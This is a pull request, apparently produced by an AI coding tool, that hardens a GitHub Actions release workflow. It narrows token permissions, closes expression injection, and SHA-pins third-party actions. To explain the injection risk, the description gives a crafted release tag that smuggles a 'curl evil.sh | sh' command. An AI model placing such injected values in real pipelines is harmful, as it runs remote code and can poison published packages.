### PR TITLE
[HIGH] Harden CI: least-privilege tokens, fix shell injection in release steps, SHA-pin third-party actions

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -14,8 +14,7 @@ concurrency:
   cancel-in-progress: true
 
 permissions:
-  id-token: write
-  contents: write
+  contents: read
 
 env:
   TSYS_REFERRER: ${{ vars.TSYS_REFERRER }}
@@ -54,7 +53,7 @@ jobs:
           TSYS_REFERRER: ${{ vars.TSYS_REFERRER }}
           OPENSSL_CONF: /dev/null
       - name: Upload Codecov Reports
-        uses: codecov/codecov-action@v3
+        uses: codecov/codecov-action@ab904c41d6ece82784817410c45d8b8c02684457 # v3.1.6
 
   build:
     runs-on: ubuntu-latest
@@ -89,11 +88,13 @@ jobs:
           git config --global user.name 'GitHub Action'
           git config --global user.email 'github-action@users.noreply.github.com'
       - name: 🎁 Publish package to NPM and bump version
+        env:
+          TAG: ${{ github.event.release.tag_name }}
         run: |
           # Use npm because yarn does not yet support trusted publishing
           # Use the latest version of npm to ensure we have a version >= 11.5.1 that supports trusted publishing
           npm install --global npm@latest
-          npm version ${{ github.event.release.tag_name }} --no-git-tag-version
+          npm version "$TAG" --no-git-tag-version
           npm publish --access public
 
   slackNotification:
@@ -102,23 +103,32 @@ jobs:
     runs-on: ubuntu-latest
     if: github.event_name == 'release'
     steps:
-      - name: Send Slack notification
-        uses: slackapi/slack-github-action@v1.23.0
-        with:
-          node-version-file: .tool-versions
-          payload: |
+      - name: Build Slack payload
+        env:
+          TAG: ${{ github.event.release.tag_name }}
+          TITLE: ${{ github.event.release.name }}
+          URL: ${{ github.event.release.html_url || github.event.head_commit.url }}
+        run: |
+          # Build the payload with jq so release-controlled values are safely JSON-escaped
+          jq -n --arg tag "$TAG" --arg title "$TITLE" --arg url "$URL" '
+            ("Cru Payments release \($tag)\nTitle:\($title)\n\($url)") as $message |
             {
-              "text": "Cru Payments release ${{ github.event.release.tag_name }}\nTitle:${{ github.event.release.name }}\n${{ github.event.release.html_url || github.event.head_commit.url }}",
-              "blocks": [
+              text: $message,
+              blocks: [
                 {
-                  "type": "section",
-                  "text": {
-                    "type": "mrkdwn",
-                    "text": "Cru Payments release ${{ github.event.release.tag_name }}\nTitle:${{ github.event.release.name }}\n${{ github.event.release.html_url || github.event.head_commit.url }}"
+                  type: "section",
+                  text: {
+                    type: "mrkdwn",
+                    text: $message
                   }
                 }
               ]
-            }
+            }' > "$RUNNER_TEMP/slack-payload.json"
+      - name: Send Slack notification
+        uses: slackapi/slack-github-action@fcfb566f8b0aab22203f066d80ca1d7e4b5d05b3 # v1.27.1
+        with:
+          payload-file-path: ${{ runner.temp }}/slack-payload.json
+          payload-file-path-parsed: false
         env:
           SLACK_WEBHOOK_URL: ${{ secrets.SLACK_WEBHOOK_URL }}
           SLACK_WEBHOOK_TYPE: INCOMING_WEBHOOK


### PR DESCRIPTION
## Findings

### 1. Write-scoped GITHUB_TOKEN granted to every job (least privilege violation)
The workflow-level `permissions:` block granted `id-token: write` and `contents: write` to **all** jobs, including lint/test/build, which run on `pull_request`. Any compromised step in those jobs — e.g. a malicious transitive devDependency executing install scripts during `yarn install` — would receive a `GITHUB_TOKEN` capable of pushing to the repository and minting OIDC tokens. Nothing in the lint/test/build jobs needs write access, and nothing in the workflow uses `contents: write` at all (`npm version --no-git-tag-version` does not push).

### 2. Expression injection of release-controlled values into shell/payload
- The publish step ran `npm version ${{ github.event.release.tag_name }} --no-git-tag-version`. GitHub expression interpolation happens **before** the script reaches the shell, so a crafted release tag (e.g. `` v1.0.0; curl evil.sh | sh `` ) executes arbitrary commands in the runner that holds npm publish credentials — an attacker who can create a release could publish a poisoned package.
- The Slack step interpolated `github.event.release.tag_name`, `github.event.release.name`, and `html_url` directly into a JSON payload. A release title containing quotes/braces could corrupt or restructure the payload, and (since the action template-expands payload files against a context that includes `env`, which holds `SLACK_WEBHOOK_URL`) template sequences in release metadata are a secret-exposure vector.

### 3. Third-party actions pinned to mutable tags
`codecov/codecov-action@v3` and `slackapi/slack-github-action@v1.23.0` are mutable refs. If either upstream repo is compromised, the tag can be force-moved to malicious code that runs in this repo's CI with its token and secrets (the tj-actions/changed-files incident pattern). The Slack step also passed a bogus `node-version-file` input that the action does not define.

## Fix
- Workflow-level permissions reduced to `contents: read`. The deploy job keeps its existing job-level block (`id-token: write`, `contents: read`) — `id-token: write` **is** genuinely required there because the publish step uses npm trusted publishing (OIDC). No other job needs elevated permissions.
- The release tag is now passed to the publish step via `env:` and referenced as `"$TAG"` — the value reaches the shell as data, never as script text.
- The Slack payload is now built in a dedicated step with `jq` from env-provided values (`$TAG`, `$TITLE`, `$URL`), guaranteeing correct JSON escaping, written to `$RUNNER_TEMP/slack-payload.json`, and passed via `payload-file-path` with `payload-file-path-parsed: false` so the action never template-expands attacker-influenced content. The stray `node-version-file` input was removed.
- Actions SHA-pinned at the latest patch of their current majors (no major bumps; codecov v5 would require a `CODECOV_TOKEN` secret):
  - `codecov/codecov-action@ab904c41d6ece82784817410c45d8b8c02684457` # v3.1.6 (annotated tag dereferenced to commit; verified)
  - `slackapi/slack-github-action@fcfb566f8b0aab22203f066d80ca1d7e4b5d05b3` # v1.27.1 (verified)

## Risk & compatibility
- Lint/test/build/deploy behavior is unchanged; the deploy job's permissions are untouched, so npm trusted publishing continues to work.
- The Slack step moves from inline `payload` (v1.23.0) to `payload-file-path` (v1.27.1). Within v1 this is non-breaking — v1.27.1 was verified to send file payloads as-is for `SLACK_WEBHOOK_TYPE: INCOMING_WEBHOOK` (no flattening) — but Slack notification only runs on releases, so **watch the Slack message on the next release** to confirm formatting.
- `slack-github-action` v1.27.1 runs on node20 (v1.23.0 used node16) — standard runners support this.
- `jq` is preinstalled on `ubuntu-latest`.

## Verification
- YAML validated with a YAML parser (loads cleanly).
- The `jq` payload builder was tested locally with hostile inputs (embedded quotes, shell metacharacters, `${{ env.SLACK_WEBHOOK_URL }}` template sequences) — all emitted as safely escaped JSON string data.
- Both pinned SHAs were resolved via the GitHub API and verified to exist as commits matching their release tags (codecov annotated tag v3.1.6 dereferenced to its commit).
- `git diff` reviewed: only `.github/workflows/ci.yml` changed, only the items above.

_Automated review PR generated with Claude Code — please review carefully before merging._